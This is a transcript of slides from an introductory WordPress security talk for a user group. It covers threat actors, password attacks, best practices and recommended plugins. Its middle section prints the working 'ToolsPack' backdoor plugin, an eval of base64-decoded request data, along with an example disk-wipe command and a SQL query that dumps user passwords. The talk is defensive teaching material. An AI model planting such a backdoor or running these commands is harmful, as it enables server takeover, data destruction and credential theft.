intro to wordpress security
DESCRIPTION
A brief overview of security concepts to give context to the threats facing Wordpress users.TRANSCRIPT
Intro to Wordpress SecurityPrepared for the Oklahoma City Wordpress User Group by Chris Dodds
Chris DoddsOwner & Principal Advisor at Focusfire IT Strategy & Consulting
Features: Ten+ years of experience across multiple industries and IT disciplines.
System Requirements: Food, water, & internet connectivity.
Certifications:CISSPMCITP:SASecurity+Network+
This talk is not about the top 5 WP security threats.
Let’s talk about Betty.
Betty’s Fancy Blog o’ Gnomes
Betty’s Fancy Server
Betty’s Fancy Audience
Betty’s Fancy Employer
It’s not about you, Betty.
The Players
Script kiddies Hacktivists Pro Criminals
Information Warriors
Enumeration
Access
Exploitation
Password Attacks
Exploit weak passwords
Dictionary based
Can be entirely automated
<?php/*Plugin Name: ToolsPackDescription: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated!Version: 1.2Author: Mark StainAuthor URI: http://checkWPTools.com/*/$_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit;?>
ToolsPack Plugin
Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
toolspack.php
Execute commands on you server
Execute commands against your WP database
$WINDIR ? `del /F/S/Q $WINDIR\*` : `rm -rf /`;
SELECT login + '-' + password FROM users
This backdoor code allows the remote user to:
More Likely...
Payload - keylogger, trojan, spyware, virus
“garden gnomes, free chaps, leather sale, cheap sex, porn,
prescription drugs, coupons, free avon”
SEO Spam - links, keywords
Best PracticesUpdate! Update! Update!
Don’t use the “admin” user.
Use a unique passphrase.
Disable or delete un-used plugins.
Backup & test your backups.
These are all things your attacker will do once they control your site.
Recommended PluginsBackup
BackWPup - open-source or BackupBuddy - commercial
Security
Better WP Security - open-source
Limit Login Attempts - open-source
Sucuri SiteCheck Scanner - http://sitecheck.sucuri.net/
Contact and Q&A
Chris Doddse-mail - [email protected] - @doddschrisweb - chrisdodds.net